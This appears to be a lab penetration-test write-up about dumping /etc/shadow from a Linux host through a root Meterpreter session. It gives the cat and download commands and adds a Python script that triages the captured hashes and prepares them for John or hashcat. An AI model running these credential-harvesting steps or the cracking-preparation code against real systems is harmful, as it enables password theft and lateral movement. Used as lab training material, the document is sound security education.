Objective: To leverage administrative access to extract the system's "shadow" file, demonstrating the ability to harvest hashed credentials for offline analysis (cracking).

1. The Post-Exploitation Phase

Once the initial shell was established on the target (192.168.56.101), the focus shifted to data exfiltration. On Linux, one of the most valuable files for an attacker is /etc/shadow, which holds the salted password hashes (not encrypted passwords) for every local account, along with password-aging fields. The hashes cannot be used directly; they must be cracked offline, which is why the file is copied off the host.

2. Technical Challenges & Solutions

During the session I hit a platform-specific limitation: the standard Metasploit priv extension (designed for Windows) was unavailable for this Linux target. I adapted by using native Linux commands to work around the tool's limitation.

Target File     Permission Required                              Data Content
/etc/passwd     Readable by all users (typically mode 0644)      Usernames, UIDs, GIDs, home directories and login shells (the password field is just "x").
/etc/shadow     root only (typically mode 0640, root:shadow,     Salted password hashes plus password-aging fields (last change, min/max age, warning, inactivity, expiry).
                so members of the shadow group can also read it)

3. Execution Workflow

  1. Identity Verification: Confirmed root privileges by running whoami (result: root). Without uid 0 (or membership of the shadow group) the next step would fail with "Permission denied".
  2. Bypassing Tool Limitations: Instead of relying on an automated "hashdump" script, I read the sensitive file directly.
  3. File Read & Capture: Used cat to print the contents of /etc/shadow to the terminal for manual capture.
  4. Download: Used the Meterpreter download command to copy the file from the target to my local Kali workspace for evidence preservation and offline cracking.

4. Key Commands Used

  • getuid: Meterpreter command that shows the user the session is running as (uid 0 / root).
  • cat /etc/shadow: Read the password hash store.
  • download /etc/shadow /home/sophy/Desktop/shadow_loot.txt: Copy the file to a local directory. The loot file now contains the target's password hashes, so restrict its permissions (for example chmod 600) and store it with the rest of the engagement evidence.
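The offline half of this exercise is what the table and workflow above lead up to: pairing the downloaded shadow file with /etc/passwd, working out which accounts actually have a crackable hash (locked "!"/"*" entries and empty password fields do not), identifying the hash algorithm from its crypt(3) prefix, and emitting unshadow-style lines that John the Ripper or hashcat accept. The following is an added example written for this page; it is not code from the original write-up or from Metasploit. The passwd and shadow contents are constructed samples, and the hash bodies are placeholder strings in the correct format, not real credentials.

```python
"""Offline triage of a captured /etc/shadow + /etc/passwd pair (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# crypt(3) hash-prefix -> algorithm name; this decides the cracking mode later.
ALGORITHMS: Dict[str, str] = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
    "$gy$": "gost-yescrypt",
}

# Constructed sample data (hash bodies are placeholders, not real hashes).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sophy:x:1000:1000:Sophy:/home/sophy:/bin/bash
svc_backup:x:1001:1001::/var/backups:/usr/sbin/nologin
guest:x:1002:1002::/home/guest:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$Xk3rT9sE$PLACEHOLDERHASHBODY0000000000000000000000000000000000000000000000000000:19500:0:99999:7:::
daemon:*:19000:0:99999:7:::
sophy:$y$j9T$5kQ2mN8pL1rS7tU9vW3xY.$PLACEHOLDERHASHBODY00000000000000000000000:19600:0:99999:7:::
svc_backup:!$6$Lk8uJ2pQ$PLACEHOLDERHASHBODY00000000000000000000000000000000000000000000000000:19300:0:99999:7:::
guest::19400:0:99999:7:::
"""


@dataclass
class ShadowEntry:
    login: str
    hash_field: str            # raw second field of the shadow line
    status: str                # "crackable", "locked", "nopasswd" or "unknown"
    algorithm: Optional[str]
    salt: Optional[str]
    last_change: str           # days since the epoch, kept as text (may be empty)


def _split_prefix(h: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (algorithm, salt) for a crypt(3)-style '$id$...' hash, else (None, None)."""
    for prefix in sorted(ALGORITHMS, key=len, reverse=True):   # longest prefix first
        if not h.startswith(prefix):
            continue
        algo = ALGORITHMS[prefix]
        parts = h.split("$")                                   # ['', id, ...]
        if algo == "bcrypt":                                   # $2b$cost$<22 salt><31 hash>
            salt = parts[3][:22] if len(parts) > 3 else None
        elif algo in ("yescrypt", "gost-yescrypt", "scrypt"):  # $y$params$salt$hash
            salt = parts[3] if len(parts) > 3 else None
        elif len(parts) > 4 and parts[2].startswith("rounds="):  # $6$rounds=N$salt$hash
            salt = parts[3]
        else:                                                  # $1$/$5$/$6$salt$hash
            salt = parts[2] if len(parts) > 2 else None
        return algo, salt
    return None, None


def classify(h: str) -> Tuple[str, Optional[str], Optional[str]]:
    """Classify one shadow password field as (status, algorithm, salt)."""
    if h == "":
        return "nopasswd", None, None           # empty field: login with no password
    if h in ("!", "!!") or h.startswith("*"):
        return "locked", None, None             # never had a usable hash
    if h.startswith("!"):
        # 'passwd -l' prepends '!' but leaves the hash intact: still crackable offline.
        algo, salt = _split_prefix(h.lstrip("!"))
        return "locked", algo, salt
    algo, salt = _split_prefix(h)
    if algo is None:
        if re.fullmatch(r"[./0-9A-Za-z]{13}", h):   # legacy DES crypt: salt is first 2 chars
            return "crackable", "descrypt", h[:2]
        return "unknown", None, None
    return "crackable", algo, salt


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow(5) lines: login:hash:lastchg:min:max:warn:inactive:expire:reserved."""
    entries: List[ShadowEntry] = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        status, algo, salt = classify(fields[1])
        entries.append(ShadowEntry(fields[0], fields[1], status, algo, salt, fields[2]))
    return entries


def unshadow(passwd_text: str, shadow_text: str, crackable_only: bool = True) -> List[str]:
    """Join passwd and shadow by login into 'login:hash:uid:gid:gecos:home:shell' lines."""
    shadow = {e.login: e for e in parse_shadow(shadow_text)}
    out: List[str] = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        entry = shadow.get(f[0])
        if entry is None or (crackable_only and entry.status != "crackable"):
            continue
        out.append(":".join([f[0], entry.hash_field] + f[2:]))
    return out


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        print(f"{e.login:<12} {e.status:<10} {e.algorithm or '-':<12} salt={e.salt or '-'}")
    print("\n".join(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)))
```

Run it against the real files with `unshadow(open("passwd").read(), open("shadow_loot.txt").read())` and write the result to a file for John; the per-account algorithm column tells you which hashcat mode to pick (for example 1800 for sha512crypt). Accounts reported as "locked" with an algorithm still have a recoverable hash, and a "nopasswd" account is a finding in its own right.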

[Screenshot] Manual exfiltration of the Linux shadow file, revealing hashed user credentials.

[Screenshot] Using Meterpreter's download command to transfer the file from the target to the attacker's workstation.

5. Professional Impact

This project highlights a "pivot mindset": the ability to troubleshoot technical hurdles (such as an unsupported extension) and still achieve the objective using core operating-system knowledge. By extracting /etc/shadow I demonstrated the final stage of a single-host compromise: the theft of credential material. Once those hashes are cracked offline, any password reused on other systems becomes a path to lateral movement across the corporate network.